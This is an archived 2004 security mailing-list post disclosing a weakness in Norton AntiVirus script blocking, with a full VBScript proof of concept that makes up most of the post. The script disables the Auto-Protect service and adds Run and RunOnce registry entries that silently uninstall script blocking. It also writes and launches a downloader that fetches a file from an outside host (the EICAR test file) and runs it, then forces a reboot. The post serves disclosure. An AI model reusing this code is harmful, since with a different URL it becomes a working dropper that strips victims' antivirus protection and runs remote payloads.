Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security VulnWatch
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[VulnWatch] Norton AntiVirus 2004/2005 Scripting Vulnerability Pt.3 (Inc

from [Daniel Milisic] Network Security [Permanent Link]
Subject: [VulnWatch] Norton AntiVirus 2004/2005 Scripting Vulnerability Pt.3 (Includes PoC VBScript Code)
Date: Thu, 11 Nov 2004 06:32:20 -0500 
Hi All,

I have major issues with the quality of Norton AntiVirus. For some history, see:

 http://seclists.org/lists/fulldisclosure/2004/Oct/0540.html
 - Norton AntiVirus 2004 Script Blocking Failure (Rant and PoC enclosed)

 http://seclists.org/lists/fulldisclosure/2004/Oct/0775.html
 - Norton AntiVirus 2004/2005 Script Blocking Redux

Symantec's Response to this issue: (From a week ago)

"ScriptBlocking is intended to provide proactive detection against script-based worms and this component of Norton AntiVirus has been effective at doing this since its introduction in 2001"

Huh?

Below is a 'typical' script-based virus that Norton AntiVirus will allow a user to run, without *any* intervention on NAV's part whatsoever. It's likely that code similar to this is already appended to script-based threats/worms to assist their penetration in the wild.

In a nutshell, here's what it does:

On Reboot it sets...

1) The NAV Auto-Protect Service to DISABLED
2) A registry key to Uninstall Script Blocking
3) Creates, launches a VBScript file to d/l the EICAR AV 'test' virus
4) Launches the EICAR.COM test pattern a few seconds later

....Then Reboots your computer.

The following code was tested under WinXP and a fully LiveUpdated NAV 2005 using a broadband Internet connection. Should be fine for Win2000 and NAV 2004 as well.

--------------//// BEGIN DISABLE_NAV.VBS ////-----------------

' ----- DISABLE NORTON AUTO-PROTECT SERVICE WITH WMI -----

sServer = "."
Set oWMI = GetObject("winmgmts://.")

sServiceName = "Norton AntiVirus Auto-Protect Service"
sWQL = "Select state from Win32_Service " _
    & "Where displayname='" & sServiceName & "'"
Set oResults = oWMI.ExecQuery(sWQL)
For Each oService In oResults
   oService.StopService
   oService.ChangeStartMode("Disabled")
Next

' -------- UNINSTALL SCRIPT BLOCKING WITH WMI ;) ----------

const HKEY_LOCAL_MACHINE = &H80000002

strComputer = "."

Set objRegistry = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
strValueName = "Uninstall Norton Script Blocking"
arrStringValues = ("MSIEXEC /x {D327AFC9-7BAA-473A-8319-6EB7A0D40138} /Q")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, arrStringValues

' -------- CREATE VBS FILE TO GRAB THE EICAR AV-REFERENCE FILE ---------

Set objRegistry = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
strValueName = "Create Code Downloader"
arrStringValues = ("cmd /c ECHO Set X=CreateObject("+chr(34)+"Microsoft.XMLHTTP"+chr(34)+"):X.open "+chr(34)+"GET"+chr(34)+",("+chr(34)+"http://www.eicar.org/download/eicar.com"+chr(34)+"),False:X.send:set Y=createobject("+chr(34)+"adodb.stream"+chr(34)+"):Y.type=1:Y.open:Y.write X.responseBody:Y.savetofile("+chr(34)+"eicar.com"+chr(34)+"),2:Y.close > estart.VBS")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, arrStringValues

' -------- CREATE VBS FILE THAT TRIGGERS CODE LAUNCH ----------

Set objRegistry = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
strValueName = "Create Code Launcer"
arrStringValues = ("cmd /c ECHO wscript.sleep(10000):Set Z=CreateObject("+chr(34)+"WSCript.Shell"+chr(34)+"):Z.run("+chr(34)+"cmd /k eicar.com"+chr(34)+") > elaunch.vbs")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, arrStringValues

' -------- LAUNCH EICAR DOWNLOADER ----------

Set objRegistry = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
strValueName = "Execute Code DownLoader"
arrStringValues = ("estart.vbs")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, arrStringValues

' --------  RUN THE 'VIRUS' ----------

Set objRegistry = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
strValueName = "Execute Malicious Code Launcher"
arrStringValues = ("elaunch.vbs")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, arrStringValues

' ---- USE WMI TO FORCE A REBOOT -- NEXT LOGIN, PWN3D ----

Set wmi    = GetObject("winmgmts:{(Shutdown)}")
set objset = wmi.instancesof("win32_operatingsystem")
 for each obj in objset
  set os = obj : exit for
 next
os.win32shutdown 2 + 4

--------------//// END DISABLE_NAV.VBS ////-----------------

Best Regards,
Daniel Milisic

[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [VulnWatch] Norton AntiVirus 2004/2005 Scripting Vulnerability Pt.3 (Includes PoC VBScript Code), Daniel Milisic <=
Previous by Date:  [Full-Disclosure] Nortel Networks Contivity VPN Client information leakage vulnerability, Network Intelligence (I) Pvt. Ltd.
Next by Date:  [Full-Disclosure] TWiki search function allows arbitrary shell command execution, Hans Ulrich Niedermann
Previous by Thread:  [Full-Disclosure] Nortel Networks Contivity VPN Client information leakage vulnerability, Network Intelligence (I) Pvt. Ltd.
Next by Thread:  [Full-Disclosure] TWiki search function allows arbitrary shell command execution, Hans Ulrich Niedermann
Indexes:  [Date] [Thread] [Top] [All Lists]